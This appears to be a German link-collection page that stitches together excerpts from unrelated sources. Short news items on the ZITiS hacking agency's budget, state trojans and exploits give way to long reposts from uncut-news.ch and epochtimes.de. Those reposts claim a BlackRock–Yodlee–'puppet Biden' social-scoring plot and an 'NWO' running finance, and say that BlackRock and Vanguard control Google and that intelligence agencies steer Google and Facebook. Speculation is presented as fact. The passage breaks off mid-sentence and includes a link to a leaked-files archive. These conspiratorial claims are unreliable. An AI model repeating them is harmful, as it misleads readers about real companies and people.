IT-Unsicherheitsbehörde Insgesamt will ZITiS nächstes Jahr mehr als zehn Millionen Euro für Investitionen ausgeben, über elf Millionen sind für Personal geplant. Das Innenministerium bezeichnet die Personalgewinnung als "anspruchsvoll" und "eine zentrale Herausforderung". Vom Behördensprech übersetzt: Nur wenige IT-Experten wollen für den Staat hacken. Der BND nannte das mal "knappe Ressource brillantes Personal". Derzeit hat ZITiS erst "74 der im Kalenderjahr 2018 zur Verfügung stehenden 150 Planstellen belegt". Fast die Hälfte der bisher eingestellten Mitarbeiter*innen ist in Verwaltung und Leitung tätig. Das existierende "MINT-Fachpersonal" arbeitet nicht nur in der Umsetzung der Aufgaben, sondern auch bei internen IT-Diensten und Beratung. Zwei Drittel der Angestellten kommen aus anderen Behörden, nur ein Drittel sind "Externe". Falk Garbsch, Sprecher des Chaos Computer Clubs, kommentiert gegenüber netzpolitik.org: Es ist gut zu sehen, dass Hacker offenbar keinerlei Interesse haben, für eine IT-Unsicherheitsbehörde zu arbeiten. Die Community hat schon vor vielen Jahren verstanden, was verbohrte Politiker nicht akzeptieren wollen: Das Ausnutzen und Offenhalten von Sicherheitslücken ist ein nachhaltiges Risiko für Unternehmen, kritische Infrastrukturen und Zivilgesellschaft. Statt Steuergelder in absurde Angriffsphantasien zu verschwenden, wird es Zeit für Investitionen in das konsequente Schließen von Sicherheitslücken. Der Regierungsentwurf zum Bundeshaushalt 2019 wird derzeit im Bundestag verhandelt. Bisher hat die Große Koalition keine Änderungen bezüglich ZITiS beantragt oder beschlossen. Anträge der Opposition werden üblicherweise abgelehnt. Ende November soll der Haushalt im Bundestag verabschiedet werden. Hier die Dokumente in Volltext: Ministerium: Bundesministerium des Innern, für Bau und Heimat Stand: 17. August 2018 ... https://netzpolitik.org/2018/36-millionen-euro-zitis-baut-supercomputer-zur-entschluesselung/ MS Windows Eins, zwei, drei, vier Staatstrojaner, netzpolitik.org, 21.03.2019 [...] ZITiS ist nicht die einzige deutsche Hacker-Behörde. Das Bundeskriminalamt kann aktuell drei Staatstrojaner einsetzen, ein vierter wird zur Zeit programmiert. Fortsetzung des Berichts: in Kürze, nach dem Listing von trojaner-board.de! Neue Analyse-Plattform: Windows-Treiber auf Trojaner untersuchen, trojaner-info.de, 27.12.2021 Microsoft bietet einen neuen Online-Service an, bei dem Entwickler und Sicherheitsforscher sich verdächtig verhaltende Treiber zur Analyse hochladen können. Oft laufen Windows-Treiber mit Kernel-Rechten. Schafft es ein Angreifer an dieser Stelle manipulierend einzugreifen, könnte er Malware tief im System verankern. Um dem vorzubeugen, stellt Microsoft ab sofort eine Analyse-Plattform für Treiber bereit. https://www.trojaner-info.de/daten-sichern-verschluesseln/aktuelles/neue-analyse-plattform-windows-treiber-auf-trojaner-untersuchen.html Hacker organisieren sich immer professioneller, trojaner-info.de, 22.12.2021 Im Laufe des Jahres 2021 haben Cyberkriminelle ihre Untergrund-Ökosysteme immer besser organisiert, sodass im neuen Jahr mit noch professionelleren Angriffsmustern gerechnet werden muss. Insbesondere Ransomware-Gruppen suchen laut den Sicherheitsexperten von Radware zunehmend Verbündete unter erfahrenen Auftragshackern, die sich über die Gewinne aus großen Erpressungskampagnen freuen. https://www.trojaner-info.de/daten-sichern-verschluesseln/aktuelles/hacker-organisieren-sich-immer-professioneller.html Scoring Sie müssen jetzt aktiv werden: Die finanzielle Übernahme & Ihr Bankkonto - BlackRock, Envestnet/Yodlee und die Federal Reserve, uncut-news.ch, 16.08.2021 Terror/Terrormanagement coreysdigs.com: Haben Sie schon einmal von Yodlee gehört? Ich auch nicht, bis ich entdeckte, dass das Unternehmen meine Daten in meinem Bankkonto sammelt und sie wahrscheinlich an Dritte verkauft. Dies wurde schnell zu einer persönlichen Recherche, bis ich erschütternde Zusammenhänge entdeckte, von denen ich erkannte, dass die Öffentlichkeit darauf aufmerksam gemacht werden muss. Bevor Sie beschließen, dass dies nichts mit Ihnen zu tun hätte, bitte ich Sie dringend, diesen Artikel in seiner Gesamtheit zu lesen und die zeitlichen Abläufe genau zu beachten, denn dies betrifft SIE ALLE, und es wird in mehreren Ländern eingeführt. Ich empfehle Ihnen, sich bei Ihrer Bank zu erkundigen und herauszufinden, welche Drittparteien in Ihre Konten verwickelt sind, und die Möglichkeit in Betracht zu ziehen, Ihre Gelder zu einer kleineren lokalen Bank zu transferieren. Hier geht es nicht nur um Spionage und Datenaggregation, sondern um einen strukturellen Aufbau, der uns in das System der Sozial- und Klimabilanz und noch darüber hinaus bringen soll. Und Biden schreibt die Anordnungen, um den Rahmen zu schaffen, den BlackRock ausgearbeitet hat. Untersuchen Sie Ihre Bank, Finanzinstitute und Ihre Konten Kurze Zusammenfassung Um es kurz zusammenzufassen: Mir war aufgefallen, dass mein Bankkonto meine Ausgaben plötzlich in Gruppen wie Einkommen, Gesundheit &Fitness, Essen &Trinken, Reisen, Dienstleistungen für Unternehmen, Haustierbedarf usw. einteilte. Mir war sofort klar, wohin das führen würde, und ich ärgerte mich besonders über die Kategorie "Einkommen", in der Gelder falsch ausgewiesen wurden, die auf Drängen der Marionette Biden direkt an das Finanzamt weitergeleitet werden sollen. Um ein soziales Punktesystem dafür zu schaffen, wie und wo man sein Geld ausgeben kann oder Zugang zu Orten oder Dienstleistungen erhält, und damit die Regierung jeden ausgegebenen Cent ausspionieren kann, muss zunächst eine Struktur aufgebaut werden. Ich habe schnell nach dem Haftungsausschluss von Drittanbietern gesucht, um zu sehen, wer meine persönlichen Finanzdaten organisiert, und fand: "Kontoaggregationsdienste werden von Yodlee, unserem Drittanbieter, bereitgestellt. Die Daten werden von Yodlee bezogen oder manuell eingegeben". Ich ging dann zu dem Abschnitt, der es angeblich ermöglicht, die Weitergabe von Daten einzuschränken, aber die Einschränkung von Yodlee war keine Option. Ich rief meine Bank an und fragte, wann der Vertrag begann, und mir wurde gesagt, 2017. Ich fragte, was Yodlee außer dieser neuen Kategorie-Aggregation noch mit meinem Bankkonto zu tun hat, und mir wurde mitgeteilt, dass sie nichts finden konnten. Ich fragte, ob sie meine Daten verkaufen würden, und der Mann wusste es nicht. Ich bat darum, die Daten zu löschen, und mir wurde gesagt, dass sie das nicht tun können. Ich erklärte, dass ich meine Konten schließen werde, wenn sie das nicht tun können, und wollte mit einem Manager sprechen. Mir wurde gesagt, ich würde einen Anruf erhalten. Das geschah nie, und Sie können darauf wetten, dass ich meine Gelder verschoben habe. Wie Sie in der Zeitleiste unten sehen werden, ist Yodlee einer der größten Finanzaggregatoren, der auch Ihre Daten verkauft und gegen den eine Sammelklage läuft, aber das wird diesen Zug nicht aufhalten. Das Unternehmen wurde 2015 von Envestnet übernommen. Zum Vergleich: Envestnet arbeitet mit 17 der 20 größten Banken sowie mit 5.200 weiteren Banken, Finanzinstituten und Unternehmen zusammen. Sie betreuen 4,8 Billionen US-Dollar an Vermögenswerten, verwalten 229 Milliarden US-Dollar an Vermögenswerten und betreiben mehr als 2 Millionen Finanzpläne pro Quartal. Envestnet betreut täglich 500 Millionen aggregierte Konten. Drei Jahre später, im Jahr 2018, erwarb BlackRock, der weltweit größte Vermögensverwalter, eine Kapitalbeteiligung an Envestnet und ging eine Partnerschaft mit dem Unternehmen ein, um seine Technologie mit der von Envestnet zu integrieren. Im darauffolgenden Jahr kamen der CEO von Envestnet und seine Frau bei einem tödlichen Autounfall ums Leben, kurz nachdem der "Going Direct"-Reset unterzeichnet worden war. Nur wenige Monate später beantragten drei Demokraten eine FTC-Untersuchung gegen Envestnet/Yodlee wegen Bedenken hinsichtlich des Datenschutzes für die Verbraucher (das ist lustig), wodurch Envestnet im Wesentlichen unter Druck gesetzt wurde. Dies ist nur die Spitze des Eisbergs, aber es ergibt sich ein gutes Bild, wenn man die nachstehende Zeitleiste betrachtet. Diese Zeitleiste hätte weit über 30 Seiten lang sein können, um die Beteiligung von BlackRock zu erläutern, da sie die NWO-Finanzshow leiten - aber dies ist dazu gedacht, das Bewusstsein der Menschen zu schärfen, damit sie ihre eigenen Banken untersuchen und selbst Entscheidungen darüber treffen können, mit wem sie Bankgeschäfte tätigen und wie sie ihre Finanzdaten und Finanzen schützen wollen. BlackRock hat drei hochrangige Positionen im Weißen Haus inne, verwaltet 7,8 Billionen Dollar an Vermögenswerten anderer Leute und ist damit der größte Vermögensverwalter der Welt. Der Konzern ist unter den drei größten Anteilseignern aller großen Unternehmen und Branchen (sehen Sie selbst nach), investiert in großem Umfang in den "Klimawandel", meidet fossile Brennstoffe und hat einen Großteil seiner Konkurrenz verschlungen. Die Spitzenreiter BlackRock und Vanguard werden bis 2027 voraussichtlich 20 Billionen Dollar verwalten. Es ist keine Überraschung, dass BlackRock und das Weiße Haus in den Regierungen Clinton, Obama und Biden eine Drehtür hatten und haben. Nicht nur das Personal wechselt zwischen den beiden Unternehmen, auch Vorstandsmitglieder von BlackRock wie Cheryl Mills, die während der Zeit der Clintons im Weißen Haus für beide tätig war, scheinen zu BlackRock überzulaufen. Sie sind die Entwickler des "Going Direct Reset" und helfen, den Weg zu ebnen. Unter dem Deckmantel der "finanziellen Wellness" und des "klimabedingten Finanzrisikos" haben sie die Finanzindustrie dazu gebracht, die Finanzdaten aller Menschen zu rationalisieren und zu überwachen, so dass sie sie durch ein soziales Bewertungssystem kontrollieren, Ihnen sagen können, wie und wo Sie Ihr Geld ausgeben sollen, und das, was ihrer Meinung nach an das Finanzamt gehen sollte, abschöpfen können. Darüber hinaus werden Billionen von Dollar den Besitzer wechseln, von den älteren Menschen zu den Millennials - und diese Leute haben in all dem ihre Finger. Schauen Sie sich den kompletten Zeitplan an, um zu verstehen, wie sich all diese Maßnahmen auf alle auswirken. Wie ich bereits letztes Jahr anmerkte - als die Stimulus-Schecks direkt eingezahlt wurden - geschah dies, um eine umfassendere Datenbank zu erstellen, als sie sie bereits über die Bankkonten der US-Bürger angelegt hatten. Das war nur ein weiterer Baustein in ihrem großen Plan. Es ging nie darum, Groschen auf Ihr Konto zu bekommen, um Ihnen zu "helfen". In diesem Zusammenhang gelang es den PPP-Kleinunternehmensdarlehen auch, Finanzdaten über Kleinunternehmen und Landwirte im ganzen Land zu erhalten. Dies war der größte manipulierte Vermögenstransfer, den dieses Land je erlebt hat. Das Jahr 2020 wird kristallklar werden, wenn Sie diesen gesamten Bericht gelesen haben. "Einblicke" = Überwachung und Kontrolle Wenn Sie sich Ihr Bankkonto ansehen, suchen Sie nach "Drittanbietern" und "Aggregatoren". Vielleicht stoßen Sie auf eine Erklärung wie die meiner Bank, warum sie Ihre Daten sammelt. Sie verpacken das Ganze mit viel Schnickschnack und suggerieren, dass sie das für Sie tun … "Sie möchten vielleicht, dass wir Ihnen nützliche Einblicke in Ihre Finanzen liefern …, damit Sie klügere finanzielle Entscheidungen treffen können." Wieder einmal wird Ihnen versichert, dass Sie nicht intelligent genug wären, um Ihr eigenes Geld zu verwalten, so wie Sie ein intelligentes Haus, ein intelligentes Telefon und eine intelligente Stadt brauchen, um zu überleben. DIES ist der Rahmen für das soziale Punktesystem. So wird es gemacht: Indem man Ihre Gelder auf Ihren Bankkonten kategorisiert und gleichzeitig ESG-Bewertungen (Umwelt, Soziales und Unternehmensführung), die von anderen Finanzinstituten vorgenommen werden, in Bezug auf Investitionen zuweist. Diese werden wahrscheinlich auch auf Ihre Bankkonten angewendet werden, insbesondere mit Bidens neuer Durchführungsverordnung. Die Kategorie "Einkommen" wird zwar nicht in der Dropdown-Liste aufgeführt (zumindest bei meiner Bank), aber sie ordnet verschiedenen Einlagen "Einkommen" zu, auch wenn es sich nicht wirklich um Einkommen handelt, was unter den einzelnen Einlagen ersichtlich ist. Letztendlich werden sie auch eine "ESG"-Spalte für klimabezogenes Tracking einrichten. Sehen Sie sich diese 6-1/2-minütige Videozusammenfassung an, die The Sharp Edge auf der Grundlage dieses Berichts produziert hat. Es enthält zwar nicht alle Details in der ausführlichen Zeitleiste unten, fasst aber vieles über diese finanzielle Übernahme zusammen. Die Zeitleiste spiegelt die wichtigsten Aktionen von BlackRock, Envestnet/Yodlee, Biden, der Federal Reserve, dem US-Finanzministerium, den Banken und dem IRS wider. Diese Zeitleiste zeigt Ihnen nicht nur, wie diese Aggregatoren Ihre Daten abgreifen, weitergeben und den Rahmen für ein Sozial- und Klimabewertungssystem schaffen, sondern auch, wer dahinter steckt, wie sie diese Show veranstalten und wohin sich dieses Spiel entwickelt. Auf diese Weise zielen Envestnet und wahrscheinlich alle Finanzinstitute darauf ab, dass die Menschen "die digitale Revolution annehmen". Sie sehen Millennials als "gewöhnt an Technologie und soziale Medien, und sie wollen nichts anderes, wenn es um ihr Finanzleben geht." 1999 Envestnet wurde gegründet Judson Bergman und Bill Crager gründeten Envestnet in Chicago, Illinois, und haben inzwischen Niederlassungen im ganzen Land. Sie verfügen über zahlreiche Marken, die alle von Faegre Drinker Biddle &Reath LLP, nur eine halbe Meile von ihrem Büro entfernt, eingetragen wurden. Envestnet hat im Laufe der Jahre eine ganze Reihe von Unternehmen übernommen, darunter FolioDynamix, FDX Advisors, PIEtech MoneyGuide, Yodlee und andere. 1999 ... https://uncutnews.ch/sie-muessen-jetzt-ativ-werden-die-finanzielle-uebernahme-ihr-bankkonto-blackrock-envestnet-yodlee-und-die-federal-reserve/ Google wird wechselweise von den Hedgefonds Blackrock und Vanguard kontrolliert Gesellschaft Zensur Whistleblower: Google manipuliert Suchlisten, epochtimes.de, 02.11.2021 Von Nancy McDonnell Eines der größten Big-Tech Unternehmen, Google, versprach einst, politisch neutral zu sein. In den vergangenen Jahren wurde jedoch immer deutlicher, dass Regierungen einen maßgeblichen Einfluss auf das Verhalten der Internet-Suchmaschine ausüben. Googles Zensurmaschine hat den wohlklingenden Namen "Machine Learning Fairness". Sie soll entwickelt worden sein, nachdem Donald Trump 2016 die Präsidentschaftswahl gewann. [...] Vorhies hat mehr als acht Jahre für Google gearbeitet. In dieser Zeit hat er 950 Seiten interner Dokumente heruntergeladen, in denen das Zensurregime von Google beschrieben wird. Die Dateien hat er an das amerikanische Justizministerium weitergeleitet, außerdem hat er die Dokumente im August 2019 über Project Veritas der Öffentlichkeit zugänglich gemacht. Mittlerweile ist auch ein Buch von ihm erschienen, "Google Leaks", in dem der interessierte Leser herausfinden kann, wie Google seine Zensur auf globaler Ebene umsetzt. [...] Doch was bedeutet das konkret für den Nutzer? "Nur Nachrichtenseiten und Webseiten, die Google durch das ‚Gatekeeping‘ lässt, dürfen in der Google-Suche eine prioritäre Listung bekommen", erklärt der Computer-Experte. Google wird wechselweise von den Hedgefonds Blackrock und Vanguard kontrolliert. Dabei handelt es sich um dieselben Hedgefonds, die auch die anderen großen Technologieunternehmen kontrollieren. Sogar die Eigentumsverhältnisse sind ähnlich verteilt. "Dafür muss man nicht einmal an irgendwelche Verschwörungstheorien glauben, denn alle Informationen sind öffentlich bekannt", sagt Vorhies und spricht von einer "ausländischen feindlichen Geheimdienstoperation gegen das Volk". Sie sei gleichzusetzen mit einer "aus dem Schatten operierenden Gruppe" und sei "eine existenzielle Bedrohung für die Demokratie". [...] Facebook und Twitter mit im Boot [...] Der ehemalige Google-Mitarbeiter ist sich sicher, dass alle großen Technologieunternehmen zusammenarbeiten. Sie hätten zwar verschiedene Nuancen in ihren komplexen und sich ständig ändernden Regelwerken, aber sie würden alle derselben Agenda folgen. Und diese sei ideologisch-politisch motiviert. [...] So sieht die Zukunft aus Die Welt steht vor großen Veränderungen. Laut Google-Whistleblower Vorhies werden die neuen Kontrollsysteme auf künstlicher Intelligenz beruhen. Das bedeute im Wesentlichen eine Technokratie, eine neue Regierungsform, über die noch niemand diskutiert hat. "Die Menschen befinden sich immer noch in der politischen Dialektik "Kapitalismus vs. Kommunismus", sagte er im Interview mit Richter. "Aber ich denke, die Zukunft wird weder kapitalistisch noch kommunistisch sein, sondern eine hocheffiziente Technokratie." Diese Technokratie werde die Gesellschaft in die Eigentümer, die Betreiber und die Untertanen aufteilen, Letztere würden in der Mehrheit sein. "Arbeit und Kapital werden vom einfachen Arbeiter völlig entkoppelt sein. Der technokratische Staat hat keine Verwendung für den gewöhnlichen Menschen, der ein unbeholfener, ineffizienter Fleischsack ist, wenn man ihn mit der übermenschlichen Intelligenz, Macht, Effizienz und Ausdauer der unermüdlichen Roboter-Arbeitskräfte vergleicht, die die Menschen ersetzen werden", so der Computer-Experte. Er glaubt, "die intellektuelle Kapazität eines jeden Menschen wird im Vergleich zur Bienenstockintelligenz der Supercomputerdatenzentren verblassen" "Wir erleben buchstäblich die Geburt einer neuen Gesellschaft. Was wir jetzt in den kommenden Jahren tun, wird für Generationen spürbar sein. Es könnte sogar den Lauf der Menschheitsgeschichte in einer Weise verändern, die wir uns nicht einmal vorstellen können", resümiert der Whistleblower und ermutigt sogleich seine Mitmenschen, ihre Macht nicht zu unterschätzen, wenn es darum gehe, die Welt zu einem besseren Ort zu machen. nur online : Eine Zip-Datei, die alle geleakten Google-Dateien enthält, kann hier heruntergeladen werden: https://mega.nz/file/IF0iVIYB#fUmHXN9ttJOMIQCyYbhP8E8-S5-x10LY5g2KytOQMu4. https://www.epochtimes.de/wissen/allgemein/whistleblower-google-manipuliert-suchlisten-a3630983.html # Exklusiv IT-Sicherheitslücken Wie weit darf der Staat gehen?, tagesschau.de, 07.09.2021 Dürfen IT-Sicherheitslücken vom Staat ausgenutzt werden? Das Bundesverfassungsgericht verlangt eine Klärung. Nach Recherchen von WDR, NDR und &qiuot;Süddeutscher Zeitung" gibt es bereits Pläne. Sie sind heiß begehrt, manche von ihnen kosten Millionen: Sicherheitslücken in IT-Systemen, im Englischen heißen sie "Exploits". Die Programmierfehler erlauben es Hackern, unbemerkt in Computer oder Smartphones einzudringen. Wer diese Lücken kennt, kann heimlich Spionagesoftware aufspielen und verschlüsselte Kommunikation überwachen. Das Wissen um die Schwachstellen ist deshalb wertvoll. Für Kriminelle genauso wie für Geheimdienste und die Polizei. https://www.tagesschau.de/investigativ/ndr-wdr/spionagesoftware-nso-bka-105.html Wie die US-Geheimdienste Google erschaffen haben, uncut-news.ch, 13.08.2021 Wer sich die Entstehungsgeschichte von Google anschaut, der stellt fest, dass Google mit Geldern der CIA und des Pentagon geschaffen wurde. Diese Informationen sind so leicht zu finden, dass man sich fragt, warum darüber so wenig bekannt ist. [...] Die nicht gewollte Freiheit des Informationszeitalters Als das Internet in den 1990er Jahren geschaffen wurde, war die Euphorie groß. Die Visionäre sahen eine neue Zeit anbrechen, das Informationszeitalter. Wissen und Informationen, so war die Hoffnung, würden im Netz für jeden frei verfügbar, die Menschen könnten unbegrenzt kommunizieren und Wissen und Informationen teilen. Es winkte eine neue Ära der wahren Freiheit und der echten Demokratie, in der jeder Zugang zu allen Informationen haben könnte. So viel Freiheit macht den Mächtigen jedoch Sorgen. Man stelle sich einmal vor, es hätte schon 1991 ein freies Internet gegeben, als die USA den Irak angegriffen haben. Damals hat die US-Regierung unter Einschaltung von PR-Agenturen Kriegspropaganda betrieben, um Sadam Hussein als den neuen Hitler zu präsentieren, damit die Menschen im Westen den anstehenden Krieg befürworten. Dazu wurde viel gelogen, zum Beispiel hat man sich die Brutkastenlüge ausgedacht, die besagte, dass irakische Soldaten in Krankenhäusern in Kuweit die Frühchen aus den Brutkästen gerissen und erschlagen hätten. Das wurde eindrucksvoll bestätigt, denn eine 16-jährige Krankenschwester aus Kuweit erzählte die Geschichte unter Tränen vor dem US-Senat. Die Bilder des weinenden Mädchens im US-Senat gingen um die Welt und das Ergebnis war, dass der Krieg gegen Sadam im Westen salonfähig wurde. Das Problem war, dass das alles gelogen war. Die Geschichte war frei erfunden und die "Krankenschwester" war in Wahrheit die Tochter des kuweitischen Botschafters in Washington. Das wusste damals aber niemand, weil es kein Internet gab, in dem man schnell hätte sehen können, wer das Mädchen in Wahrheit war. Heute könnte jeder diese Geschichte innerhalb von zehn Minuten widerlegen, indem man im Netz nach Fotos sucht und die Geschichte überprüft. Daher machte man sich in der US-Regierung schnell Gedanken, wie man das Internet kontrollieren und sogar als Waffe im "Informationskrieg" (man sprach von "Konflikten im Informationszeitalter") nutzen könnte. Das Highland Forum Daher hat das Pentagon schon 1994, als normale Menschen noch gar nicht wussten, was das Internet überhaupt ist, das Highland Forum gegründet, dessen Aufgabe es war, die Gefahren des anbrechenden Informationszeitalters zu analysieren und nach Wegen zu suchen, wie man das Internet kontrollieren könnte. Seine erste formelle Sitzung fand im Februar 1995 statt. Finanziert wurde das Projekt vom für Geheimdienste und Informationskontrolle verantwortlichen US-Vizeverteidigungsminister. Den gibt es wirklich, seine offizielle Abkürzung lautet PDASD(C3I). Auch die DARPA war von Anfang an mit im Boot. Die DARPA ist eine Behörde des Pentagon, deren Aufgabe es salopp ausgedrückt ist, Science Fiction zu erforschen. Die DARPA finanziert Forschungsprojekte, die wie Science Fiction anmuten, die sich aber im Erfolgsfall als Waffen einsetzen lassen. Daher überrascht es nicht, dass die DARPA von Anfang an mit dabei war, als es um die Frage ging, wie die US-Regierung das Internet kontrollieren und den Informationsfluss dort beeinflussen oder sogar lenken könnte. [...] Auch die Geheimdienste NSA und DIA und wahrscheinlich auch die CIA waren von Anfang an in die Arbeit des Highland Forums eingebunden. Die Verbindung zu Google Während 1994 das Highland Forum gegründet wurde, gelang zwei jungen Studenten der Stanford University der Durchbruch bei der sogenannten automatisierten Web-Crawling- und Page-Ranking-Anwendung. Die beiden Studenten waren die späteren Google-Gründer Sergey Brin und Larry Page und was sie da entwickelt hatten, ist das Kernstück der Suchmaschine Google. Unbestritten ist, dass Sergey Brin seine Forschung von der US-Regierung bezahlt bekam. Er hatte ein Stipendium der National Science Foundation, einer dem Pentagon und den US-Geheimdiensten nahestehende Behörde der US-Regierung. Das hat zunächst einmal nicht viel zu bedeuten, viele Studenten bekommen Stipendien von Behörden, die Geheimdiensten nahestehen. So arbeiten Geheimdienste generell: Sie sind an Universitäten sehr aktiv und suchen dort den Kontakt zu vielversprechenden Studenten. Da niemand im Voraus weiß, welche Studenten später wichtige Persönlichkeiten (egal, ob in Politik, Wirtschaft, Wissenschaft, etc) werden, spannen sie ein sehr weites Netz. Dabei werden Stipendien vergeben oder unverfängliche Workshops und Seminare finanziert, bei denen die Geheimdienste Kontakte knüpfen und Informationen über die Teilnehmer sammeln. Die meisten dieser Informationen landen in den Akten und werden nie gebraucht, aber Kontakte zu vielversprechenden Studenten werden für den Fall gepflegt, dass man sie mal brauchen kann. Das Stipendium von Brin und andere Stipendien, die Leute, die später in Silicon Valley Karriere gemacht haben, bekommen haben, zeigen, dass die US-Geheimdienste bei der Entstehung der Internetkonzerne von Anfang an im Boot waren und beste Kontakte ins Silicon Valley haben. Sergey Brin war einer von denen, zu dem man die Kontakte sehr intensiv gepflegt hat. Das ist bekannt, denn die Informatikerin-Professorin Bhavani Thuraisingham hat 2013 in einem Artikel geschrieben, dass sie in den 1990ern für die US-Geheimdienste ein Projekt namens Massive Digital Data Systems (MDDS) geleitet hat, In ihrem Artikel schreibt sie: "Tatsächlich wurde der Google-Gründer, Sergey Brin, teilweise durch dieses Programm finanziert, als er Doktorand in Stanford war. Er entwickelte zusammen mit seinem Berater Prof. Jeffrey Ullman und meinem Kollegen bei MITRE, Dr. Chris Clifton, das Query Flocks System, das Lösungen für das Mining großer Datenmengen in Datenbanken produzierte. Ich erinnere mich, dass ich Stanford mit Dr. Rick Steinheiser von der Intelligence Community besuchte und Brin auf Rollschuhen hereinstürmte, seine Präsentation hielt und wieder hinausrauschte. Tatsächlich demonstrierte uns Mr. Brin bei unserem letzten Treffen im September 1998 seine Suchmaschine, aus der bald darauf Google wurde." Am 4. September 1998, also genau zu der Zeit, wurde Google gegründet. Das Pseudo-Dementi ... All dies hat der britische Journalist Nafeez Mosaddeq Ahmed schon 2015 zusammengetragen, seinen Artikel, der wesentlich tiefer in die Materie einsteigt, als ich es hier tue, habe ich am Ende meines Artikels verlinkt. Nafeez Ahmed endete seinen Artikel 2015 mit den Worten: "So berichtete Brin regelmäßig an Thuraisingham und Steinheiser über seine Arbeit bei der Entwicklung von Google." [...] Die Rolle der US-Geheimdienste Man kann es drehen und wenden, wie man will - Google ist definitiv mit finanzieller Unterstützung und unter enger Betreuung der US-Geheimdienste entstanden. Besonders wichtig ist der Hinweis auf die DARPA, denn die DARPA ist eine Behörde des US-Verteidigungsministeriums, die Forschungs-Projekte für die Streitkräfte der Vereinigten Staaten durchführt. Die DARPA unterstützt nichts, was nicht als Waffe verwendet werden kann und die DARPA hat die Forschung bezahlt, die Google erst möglich gemacht hat. Dass Google als Firma danach mit privaten Mitteln entstanden ist, bestreitet niemand. Aber der Kontakt zu den US-Geheimdiensten war schon vor der Gründung von Google vorhanden. Und wenn wir uns in Erinnerung rufen, dass die Kontrolle des Internets zu der Zeit eine Priorität der US-Regierung war (siehe Highland Forum), dann werden die Geheimdienste den Kontakt zu Brin und Page sicher aufrecht erhalten haben. Geheimdienste haben die Angewohnheit, dass sie jemanden, den sie wichtig finden, an der kurzen Leine und notfalls mit mehr oder weniger sanftem Druck auf Linie halten. Selbst wenn Brin und Page die allerbesten Absichten hatten, sie waren bereits am Haken der US-Geheimdienste. Das alles zeigt, dass das MDDS-Programm der US-Geheimdienste CIA und NSA nicht nur die Arbeit von Brin und Page an der Entwicklung der technischen Grundlagen von Google teilweise finanziert hat, sondern dass hochrangige Vertreter der US-Geheimdienste, zum Beispiel in Person des CIA-Beamten Steinheiser, die Entwicklung von Google vor seiner Gründung beaufsichtigt haben, bis das Unternehmen zur Gründung bereit war. Google wurde also mit einer entscheidenden Startfinanzierung und unter Aufsicht der US-Regierung ermöglicht: nämlich durch die CIA, die NSA und die Pentagon-Behörde DARPA. Das bedeutet, dass die Geheimdienste ganz sicher vom ersten Tag an Einfluss auf Google hatten. Und wenn Geheimdienste Einfluss auf etwas oder jemanden haben, geben sie den freiwillig nie wieder auf. Google und die CIA Die CIA hat eine eigene Risikokapitalgesellschaft namens In-Q-Tel, die in Start-Ups investiert, die die CIA für vielversprechend hält. So war es Anfang der 2000er Jahre noch ein Traum, die Welt auf Basis aktueller Satellitenbilder virtuell auf 3D-Bildern "überfliegen" zu können. Für Geheimdienste war das, was heute mit Google-Earth für uns alle normal ist, damals noch ein Traum. Diese Technologie wollte die 1999 gegründete Firma Keyhole erforschen und das fand die CIA so interessant, dass sie im Juni 2003 über In-Q-Tel bei Keyhole eingestiegen ist. Und schon im Oktober 2004 hat Google Keyhole für eine unbekannte Summe von der CIA-Firma In-Q-Tel gekauft. Sie alle kennen Keyhole, denn Google hat das Unternehmen in Google-Earth umbenannt. Wieder sehen wir, dass mit Google-Earth ein für Google ausgesprochen wichtiges Tool enge Verbindungen zur CIA hat, die die Technologie zunächst gekauft und dann an Google weitergegeben hat. Ein weiteres Beispiel ist MindMeld. MindMeld ist eine Firma, die sich auf Spracherkennungssoftware spezialisiert hat. Laut Businessinsider wurde die Firma dabei von Google unterstützt und - oh Wunder - 2014 hat sich auch In-Q-Tel bei MindMeld eingekauft. Der Artikel im Businessinsider ist übrigens sehr interessant, denn dort wurden 14 interessante Firmen aufgelistet, bei denen In-Q-Tel die Hände im Spiel hat. Google und die DARPA Die DARPA war, wie gesehen, eine der Geburtshelferinnen von Google und die engen Verbindungen sind nie abgerissen. So gibt es immer wieder Meldungen, dass Google teilweise für das US-Militär forscht, wenn es beispielsweise um autonomes Fahren geht, denn diese Technologie ist für potenzielle Kampfroboter ausgesprochen wichtig. Ein besonders eindrucksvolles Beispiel für die enge Verbindung zwischen der DARPA und Google ist eine Personalie aus dem Jahr 2012. Damals wechselte Regina Dugan, die Chefin der DARPA, zu Google. Die DARPA finanziert die Forschung an den geheimsten der geheimen Militärtechnologien, Frau Dugan war also eine Geheimnisträgerin erster Güte. Und so eine wichtige Person wechselt mal eben in die Privatwirtschaft und die US-Regierung macht sich keine Sorgen, in welche Hände ihr Wissen geraten könnte? Oder anders gesagt: Ob man ihr wohl erlaubt hätte, zum Beispiel zur Rüstungsabteilung von Airbus zu wechseln, die nicht unter der Kontrolle der US-Regierung steht? Wohl kaum. Das zeigt ein weiteres Mal, wie eng die Verbindungen zwischen Google und den Militär- und Geheimdienstkreisen der USA sind. Damit aber nicht genug, 2016 wechselte sie zu Facebook. Das Handelsblatt schrieb darüber später: ... Bei der Entwicklerkonferenz F8 im April sprach Regina Dugan erstmals von ihren Plänen. Die neue Chefin von Facebooks Hardware-Einheit "Building 8" wollte für Mark Zuckerberg neue Produkte entwickeln, darunter eine Technologie, die künftig elektronisch erfasse, was ein Nutzer denke. Der Chef jubelte Dugan zu." Schon Ende 2017 hat sie Facebook wieder verlassen, ohne mitzuteilen, was sie danach machen wollte. Auch bei Facebook gehe ich von engsten Verbindungen zu den US-Geheimdiensten aus, dazu werde ich gesondert recherchieren. Die Kontrolle des Internets Die US-Regierung hat sich in den 1990ern das Ziel gesteckt, das Internet zu kontrollieren, dazu wurde das Highland Forum gegründet und die US-Geheimdienste haben das MDDS-Projekt gehabt. Das sind nur die bekannten Informationen, was im Geheimen abgelaufen ist, können wir nur raten. Man wird schnell verstanden haben, dass man die User im Internet "kanalisieren" muss. Es muss Diskussionsforen geben, wo die Menschen sich austauschen und wo sie Nachrichten konsumieren, denn das Internet hat für viele Menschen Zeitungen und Fernsehnachrichten ersetzt. Ein solches Diskussionsforum sollte möglichst eine Monopolstellung haben, damit die Menschen sich dort sammeln und austauschen und man das auf diese Weise kontrollieren kann. Genau das ist - so meine Interpretation - Facebook. Daher meine Vermutung, dass Facebooks Entstehung ebenfalls mit den US-Geheimdiensten verbunden ist. Google kontrolliert ebenfalls das Internet, denn durch seine Algorithmen kann Google die Suchergebnisse so sortieren, dass die User nur das zu sehen bekommen, was sie sehen sollen. So wurde im Zuge des letzten US-Wahlkampfes beispielsweise bekannt, dass Google die Suchergebnisse zu Trump und Biden so sortieren wollte, 